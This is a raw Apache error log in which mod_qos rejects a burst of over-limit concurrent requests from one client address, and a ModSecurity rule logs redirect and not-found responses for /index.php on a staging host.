[Tue May 26 19:59:13.974332 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrdAAAABk
[Tue May 26 19:59:13.974524 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp2511gAAAdc
[Tue May 26 19:59:13.975328 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrdQAAAC0
[Tue May 26 19:59:13.975385 2026] [qos:error] [pid 93868:tid 94276] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp2511QAAAaE
[Tue May 26 19:59:13.978608 2026] [qos:error] [pid 93868:tid 94301] [client 45.148.10.120:34982] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp2511wAAAbo
[Tue May 26 19:59:13.979018 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrdgAAACc
[Tue May 26 19:59:13.980707 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp2512AAAAe8
[Tue May 26 19:59:13.981400 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrdwAAAGE
[Tue May 26 19:59:13.982306 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszreAAAAF8
[Tue May 26 19:59:13.995590 2026] [qos:error] [pid 93868:tid 94286] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp2512QAAAas
[Tue May 26 19:59:14.125039 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOkqK9k_ZUB2Vp2514AAAAfI
[Tue May 26 19:59:14.125501 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOkqK9k_ZUB2Vp2514QAAAdc
[Tue May 26 19:59:14.126085 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOmDRMqfxdEDkoszrfAAAAAI
[Tue May 26 19:59:14.126275 2026] [qos:error] [pid 93868:tid 94276] [client 45.148.10.120:34982] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOkqK9k_ZUB2Vp2514gAAAaE
[Tue May 26 19:59:14.126468 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOmDRMqfxdEDkoszrfQAAAAo
[Tue May 26 19:59:14.128845 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOmDRMqfxdEDkoszrfgAAABE
[Tue May 26 19:59:14.130492 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOmDRMqfxdEDkoszrfwAAAG8
[Tue May 26 19:59:14.132606 2026] [qos:error] [pid 93868:tid 94301] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOkqK9k_ZUB2Vp2514wAAAbo
[Tue May 26 19:59:14.134238 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOmDRMqfxdEDkoszrgAAAAH8
[Tue May 26 19:59:14.149813 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOkqK9k_ZUB2Vp2515AAAAe8
[Tue May 26 19:59:14.274190 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq-gAAAAU"]
[Tue May 26 19:59:14.275028 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszrBQAAAFw"]
[Tue May 26 19:59:14.276956 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOEqK9k_ZUB2Vp251IgAAAfU"]
[Tue May 26 19:59:14.281555 2026] [security2:error] [pid 93868:tid 94366] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOEqK9k_ZUB2Vp251JQAAAfs"]
[Tue May 26 19:59:14.284897 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOEqK9k_ZUB2Vp251MgAAAZE"]
[Tue May 26 19:59:14.287018 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq-AAAAD4"]
[Tue May 26 19:59:14.289130 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq5gAAAEU"]
[Tue May 26 19:59:14.289453 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq2gAAAHo"]
[Tue May 26 19:59:14.298949 2026] [security2:error] [pid 93868:tid 94378] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOEqK9k_ZUB2Vp251MwAAAgc"]
[Tue May 26 19:59:14.306075 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszrGAAAADk"]
[Tue May 26 19:59:14.310446 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszrFQAAAGQ"]
[Tue May 26 19:59:14.319930 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOEqK9k_ZUB2Vp251LgAAAcE"]
[Tue May 26 19:59:14.327738 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszrAgAAAGY"]
[Tue May 26 19:59:14.340139 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOEqK9k_ZUB2Vp251PgAAAbw"]
[Tue May 26 19:59:14.344510 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszrFwAAADw"]
[Tue May 26 19:59:14.344797 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251bwAAAc0"]
[Tue May 26 19:59:14.349654 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOEqK9k_ZUB2Vp251PQAAAfE"]
[Tue May 26 19:59:14.351344 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251bQAAAcI"]
[Tue May 26 19:59:14.357913 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszrAQAAACI"]
[Tue May 26 19:59:14.360393 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOEqK9k_ZUB2Vp251PwAAAg0"]
[Tue May 26 19:59:14.381100 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszrFAAAAG4"]
[Tue May 26 19:59:14.383827 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq_AAAAA8"]
[Tue May 26 19:59:14.395217 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251egAAAb4"]
[Tue May 26 19:59:14.397029 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251dgAAAcY"]
[Tue May 26 19:59:14.402140 2026] [security2:error] [pid 93868:tid 94269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251cAAAAZo"]
[Tue May 26 19:59:14.411561 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOWDRMqfxdEDkoszrSAAAAFg"]
[Tue May 26 19:59:14.419709 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251ewAAAec"]
[Tue May 26 19:59:14.431215 2026] [security2:error] [pid 93868:tid 94325] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251eAAAAdI"]
[Tue May 26 19:59:14.434085 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251gQAAAco"]
[Tue May 26 19:59:14.445200 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251nAAAAZ8"]
[Tue May 26 19:59:14.792018 2026] [security2:error] [pid 93576:tid 93730] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuOmDRMqfxdEDkoszrgwAAABI"]
[Tue May 26 19:59:15.099437 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszrtQAAACs
[Tue May 26 19:59:15.099893 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuO2DRMqfxdEDkoszrtgAAAD0
[Tue May 26 19:59:15.100126 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuO2DRMqfxdEDkoszrtwAAAGQ
[Tue May 26 19:59:15.101661 2026] [qos:error] [pid 93576:tid 93721] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszrvAAAAAk
[Tue May 26 19:59:15.103549 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszrvQAAADw
[Tue May 26 19:59:15.103812 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszrvgAAAAA
[Tue May 26 19:59:15.104597 2026] [qos:error] [pid 93868:tid 94277] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuO0qK9k_ZUB2Vp252OwAAAaI
[Tue May 26 19:59:15.105302 2026] [qos:error] [pid 93868:tid 94277] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252PAAAAaI
[Tue May 26 19:59:15.105471 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuO2DRMqfxdEDkoszrvwAAAEA
[Tue May 26 19:59:15.106366 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252PQAAAdE
[Tue May 26 19:59:15.254289 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszrwgAAAHs
[Tue May 26 19:59:15.254769 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszrwwAAACE
[Tue May 26 19:59:15.255245 2026] [qos:error] [pid 93868:tid 94314] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252RgAAAcc
[Tue May 26 19:59:15.257057 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszrxAAAACg
[Tue May 26 19:59:15.258090 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszrxwAAACg
[Tue May 26 19:59:15.258420 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszrxQAAACI
[Tue May 26 19:59:15.258418 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszrxgAAAHw
[Tue May 26 19:59:15.261202 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszryAAAAFQ
[Tue May 26 19:59:15.261488 2026] [qos:error] [pid 93868:tid 94305] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252RwAAAb4
[Tue May 26 19:59:15.263342 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszryQAAAGo
[Tue May 26 19:59:15.277689 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251lgAAAd8"]
[Tue May 26 19:59:15.284860 2026] [security2:error] [pid 93868:tid 94331] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251iAAAAdg"]
[Tue May 26 19:59:15.284869 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251hgAAAeE"]
[Tue May 26 19:59:15.287779 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251cgAAAeI"]
[Tue May 26 19:59:15.288060 2026] [security2:error] [pid 93868:tid 94381] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251ogAAAgo"]
[Tue May 26 19:59:15.292846 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOWDRMqfxdEDkoszrYAAAADA"]
[Tue May 26 19:59:15.306060 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOWDRMqfxdEDkoszrXwAAACM"]
[Tue May 26 19:59:15.306635 2026] [security2:error] [pid 93868:tid 94335] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251dQAAAdw"]
[Tue May 26 19:59:15.306876 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251jAAAAfQ"]
[Tue May 26 19:59:15.310091 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251mwAAAaU"]
[Tue May 26 19:59:15.313872 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251oAAAAf8"]
[Tue May 26 19:59:15.314467 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251igAAAak"]
[Tue May 26 19:59:15.321033 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOWDRMqfxdEDkoszrWAAAAGw"]
[Tue May 26 19:59:15.325170 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251pQAAAdQ"]
[Tue May 26 19:59:15.331028 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251mQAAAb0"]
